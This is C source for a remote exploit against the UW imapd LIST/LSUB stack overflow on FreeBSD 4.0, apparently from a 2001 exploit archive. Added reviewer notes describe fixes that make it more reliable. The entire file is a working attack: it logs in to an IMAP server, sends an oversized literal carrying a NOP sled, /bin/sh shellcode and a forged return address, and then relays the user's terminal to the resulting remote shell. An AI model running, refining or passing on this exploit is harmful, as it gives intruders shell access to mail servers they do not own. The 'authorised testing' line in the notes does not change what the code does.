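//
// imapd sploit
// [ list/lsub vulnerability ]
//
// eggcode:
//   freebsd
//
// default valuez for target:
//   freebsd4.0-rel + imap4rev1 2000.278
//
// coder:
//   p0kem0n / kidz team
// email:
//
//
// comments:
//   i am a lazy shit. so there isn't userfriendly
//   command line i-face.
//
// p.s.: no errors checking
//
// greetz to:
//   all active members of [kidz team], dummYcube, mazz
//
// Review notes:
//   Historical proof-of-concept for the UW imapd LIST/LSUB stack overflow:
//   a BUF_SIZE+8 byte literal argument to LIST overruns a fixed buffer, and
//   the saved return address at offset BUF_SIZE+4 is pointed at the egg
//   (the NOP sled in front of it absorbs small errors in body_addr). The
//   egg appears to execve "//bin/sh" and relies on imapd running under inetd
//   with the socket as fd 0/1 — nothing in it redirects descriptors.
//   The attack logic is kept as written; the edits are reviewer fixes:
//     - header names lost in extraction restored;
//     - every recv() result is NUL-terminated before it is used as a string,
//       and a closed connection is reported instead of read as an empty reply;
//     - short/partial sends are completed rather than aborting;
//     - the IMAP literal continuation ("+ ...") is checked before the carrier
//       is sent, and no blocking read follows the carrier (a working egg
//       hands the socket to a shell that prints nothing until fed input);
//     - the fd_set in the interactive loop is zeroed on every iteration
//       (it was never initialised);
//     - optional argv[2] overrides body_addr; IMAP_USER / IMAP_PASS in the
//       environment override the compiled-in credentials.
//   Usage: <prog> host [return-address]
//   Return address and egg are specific to FreeBSD 4.0 on x86. Use only
//   against systems you are authorised to test.
//
#include <errno.h>
#include <netdb.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

#define IMAP_PORT 143
#define FAT 512        // offset of the egg inside the carrier (after the NOP sled)
#define BUF_SIZE 1024  // size of the overflowed buffer in imapd
#define LBUF 512       // size of the local I/O buffers
//#define DEBUG

#define LOGIN "uza"             // don't forget to modify (or export IMAP_USER)
#define PASSWORD "lapassworde"  // (or export IMAP_PASS)

char alien_egg[] =  // idea of anathema. respect.
    "\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"
    "\x51\x52\x53\x53\x6a\x3b\x58\xcd\x80\x66\x31\xc0\xcd\x80";

// Guessed address of the overflowed buffer on the target's stack.
unsigned long body_addr = 0xbfbfeb68; // calibrate it for non default
                                      //0xbfbfea4c - preauth mode

void alien_makeup(char *carrier, const char *egg);
int arrive(const char *hosty, int port);
int infect(int body, const char *carrier);
void alien_work(int body);

static int write_all(int fd, const void *data, size_t len);
static int slurp(int body, char *buf);

// Entry point: build the carrier, connect, log in, deliver the carrier and
// then relay stdin/stdout to the socket. Exit status 1 on any failure.
int main(int argc, char **argv)
{
    char carrier[4 * LBUF];
    const char *prog = (argc > 0 && argv[0] != NULL) ? argv[0] : "sploit";
    int payback;
    int body;

    printf(" [ %-11s ][ starting.... ]\n", prog);

    if (argc < 2 || argc > 3) {
        printf("\t\t[ error in parameterz! ]\n");
        printf("\t\t[ you must specify host ]\n");
        printf("\t\t[ usage: %s host [return-address] ]\n", prog);
        exit(1);
    }
    if (argc == 3) {
        // Optional override for body_addr ("calibrate it" above); base 0
        // accepts 0x-prefixed hex as well as decimal.
        char *end = NULL;
        unsigned long addr;
        errno = 0;
        addr = strtoul(argv[2], &end, 0);
        if (end == argv[2] || *end != '\0' || errno == ERANGE) {
            printf("\t\t[ bad return address: %.32s ]\n", argv[2]);
            exit(1);
        }
        body_addr = addr;
    }

    alien_makeup(carrier, alien_egg);
    printf("\t\t[ alien maked ]\n");

    printf("\t\t[ connect to %.32s.... ]\n", argv[1]);
    body = arrive(argv[1], IMAP_PORT);
    if (body < 0) {
        printf("\t\t\t[ failed! ]\n");
        exit(1);
    }
    printf("\t\t\t[ successful ]\n");

    // infect() closes the socket itself on every failure path.
    if ((payback = infect(body, carrier)) < 0) {
        printf("\t\t[ error sending carrier ]\n\t\t\t[ ");
        switch (payback) {
        case -1:
            printf(" possibly connection error ]\n");
            break;
        case -2:
            printf(" kid, there isn't such a bug! ]\n");
            break;
        case -3:
            printf(" get correct password first! ]\n");
            break;
        default:
            printf(" unknown error %d ]\n", payback);
            break;
        }
        exit(1);
    }
    printf("\t\t[ INFECTED! ]\n");

    printf("\t\t[ alien at work ]\n");
    printf("\t\t\t[ begin ]\n");
    alien_work(body);
    printf("\t\t\t[ alien iz dead ]\n");
    printf("\t\t[ end ]\n");
    close(body);

    printf(" [ %-11s ][ session is over ]\n", prog);
    return 0;
}

// Fill carrier (4*LBUF bytes) with the payload layout:
//   [0, FAT)                 NOP sled (0x90)
//   [FAT, FAT+strlen(egg))   the egg, no terminator
//   ...                      more NOPs
//   [BUF_SIZE+4, +8)         return address = body_addr + FAT (host byte order;
//                            the exploit assumes an x86 host and target)
//   [BUF_SIZE+8, +12)        "\n\n\0\0": ends the LIST command after the literal
//                            and terminates the carrier as a C string
void alien_makeup(char *carrier, const char *egg)
{
    size_t egglen = strlen(egg);
    uint32_t ret = (uint32_t)(body_addr + FAT);
    uint32_t tail = 0x00000a0aU;

    memset(carrier, 0x90, 4 * LBUF);
    memcpy(carrier + FAT, egg, egglen);
    // memcpy instead of a cast store: no alignment or aliasing assumptions,
    // and always exactly four bytes regardless of sizeof(unsigned long).
    memcpy(carrier + BUF_SIZE + 4, &ret, sizeof ret);
    memcpy(carrier + BUF_SIZE + 8, &tail, sizeof tail);

#ifdef DEBUG
    printf(" [debug][ carrier: %s ]\n", carrier);
    printf("\t[ carriersize: %zu ]\n", strlen(carrier));
    printf("\t[ eggsize: %zu ]\n", egglen);
    printf("\t[ alien_addr: 0x%08lx ]\n", (unsigned long)ret);
#endif
}

// Resolve hosty (IPv4 only) and open a TCP connection to port.
// Returns the connected socket, or -1 on any failure.
int arrive(const char *hosty, int port)
{
    struct sockaddr_in way;
    struct hostent *hp;
    int sock;

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0)
        return -1;

    memset(&way, 0, sizeof way);
    way.sin_family = AF_INET;
    way.sin_port = htons((uint16_t)port);

    hp = gethostbyname(hosty);
    if (hp == NULL || hp->h_addrtype != AF_INET
        || hp->h_length != (int)sizeof way.sin_addr
        || hp->h_addr_list[0] == NULL) {
        close(sock);
        return -1;
    }
    memcpy(&way.sin_addr, hp->h_addr_list[0], sizeof way.sin_addr);

    if (connect(sock, (struct sockaddr *)&way, sizeof way) < 0) {
        close(sock);
        return -1;
    }
    return sock;
}

// Write all len bytes of data to fd, completing short writes.
// Returns 0 on success, -1 on error or when the peer stops accepting data.
static int write_all(int fd, const void *data, size_t len)
{
    const unsigned char *p = data;
    size_t done = 0;

    while (done < len) {
        ssize_t put = write(fd, p + done, len - done);
        if (put < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        if (put == 0)
            return -1;
        done += (size_t)put;
    }
    return 0;
}

// Read one chunk of server output into buf[LBUF], always NUL-terminated.
// Returns the byte count, or -1 on error or if the server closed the
// connection (the original treated a closed connection as an empty reply).
static int slurp(int body, char *buf)
{
    ssize_t got;

    memset(buf, 0, LBUF);
    do {
        got = recv(body, buf, LBUF - 1, 0);
    } while (got < 0 && errno == EINTR);
    if (got <= 0)
        return -1;
    buf[got] = '\0';
#ifdef DEBUG
    printf(" // %s", buf);
#endif
    return (int)got;
}

// Log in and deliver the carrier as the mailbox argument of LIST.
// Returns 1 once the carrier has been sent; on failure closes body and
// returns -1 (connection error), -2 (server refused the literal),
// -3 (login rejected).
int infect(int body, const char *carrier)
{
    char buf[LBUF];
    const char *user = getenv("IMAP_USER");
    const char *pass = getenv("IMAP_PASS");
    int n;

    if (user == NULL || *user == '\0')
        user = LOGIN;
    if (pass == NULL || *pass == '\0')
        pass = PASSWORD;

    // Greeting banner.
    if (slurp(body, buf) < 0) {
        close(body);
        return -1;
    }

    // Plaintext LOGIN; the tag "dead" is reused for every command.
    n = snprintf(buf, sizeof buf, "dead login %s %s\n", user, pass);
    if (n < 0 || (size_t)n >= sizeof buf || write_all(body, buf, (size_t)n) < 0) {
        close(body);
        return -1;
    }
    if (slurp(body, buf) < 0) {
        close(body);
        return -1;
    }
    // Tagged reply is "dead OK ..." on success; buf is zero-filled, so the
    // offset is safe even for a reply shorter than 5 bytes.
    if (strncmp(buf + 5, "OK", 2) != 0) {
        close(body);
        return -3;
    }

    // Announce a literal of BUF_SIZE+8 bytes as the LIST mailbox argument.
    n = snprintf(buf, sizeof buf, "dead list \"\" {%d}\n", BUF_SIZE + 8);
    if (n < 0 || (size_t)n >= sizeof buf || write_all(body, buf, (size_t)n) < 0) {
        close(body);
        return -1;
    }

    // Synchronising literal: the server answers with a "+" continuation
    // request before it reads the literal bytes. A tagged NO/BAD here means
    // the overflowing argument will never be parsed. The original sent the
    // carrier without waiting; if a target does not send a continuation,
    // drop this check and send immediately as before.
    if (slurp(body, buf) < 0) {
        close(body);
        return -1;
    }
    if (buf[0] != '+') {
        close(body);
        return -2;
    }

    // The carrier is the BUF_SIZE+8 literal bytes followed by "\n\n", which
    // ends the command once imapd has consumed the literal.
    if (write_all(body, carrier, strlen(carrier)) < 0) {
        close(body);
        return -1;
    }

    // No blocking read here: if the egg ran, the socket now belongs to a
    // shell that prints nothing until given input. Whatever the server does
    // say (e.g. a tagged reply meaning it survived) shows up in alien_work().
    return 1;
}

// Relay stdin -> body and body -> stdout until either side hits EOF or an
// error. Returns when the session is over; the caller closes body.
void alien_work(int body)
{
    char buf[LBUF];
    fd_set fds;

    if (body < 0 || body >= FD_SETSIZE)
        return;  // FD_SET on such a descriptor is undefined

    for (;;) {
        FD_ZERO(&fds);  // select() rewrites the set; rebuild it every pass
        FD_SET(STDIN_FILENO, &fds);
        FD_SET(body, &fds);

        if (select(body + 1, &fds, NULL, NULL, NULL) < 0) {
            if (errno == EINTR)
                continue;
            return;
        }

        if (FD_ISSET(STDIN_FILENO, &fds)) {
            ssize_t len = read(STDIN_FILENO, buf, sizeof buf);
            if (len <= 0)
                return;  // EOF on our side ends the session
            if (write_all(body, buf, (size_t)len) < 0)
                return;
        }
        if (FD_ISSET(body, &fds)) {
            ssize_t len = read(body, buf, sizeof buf);
            if (len <= 0)
                return;  // peer closed: shell exited or imapd died
            if (write_all(STDOUT_FILENO, buf, (size_t)len) < 0)
                return;
        }
    }
}

/* www.hack.co.za [14 April 2001]*/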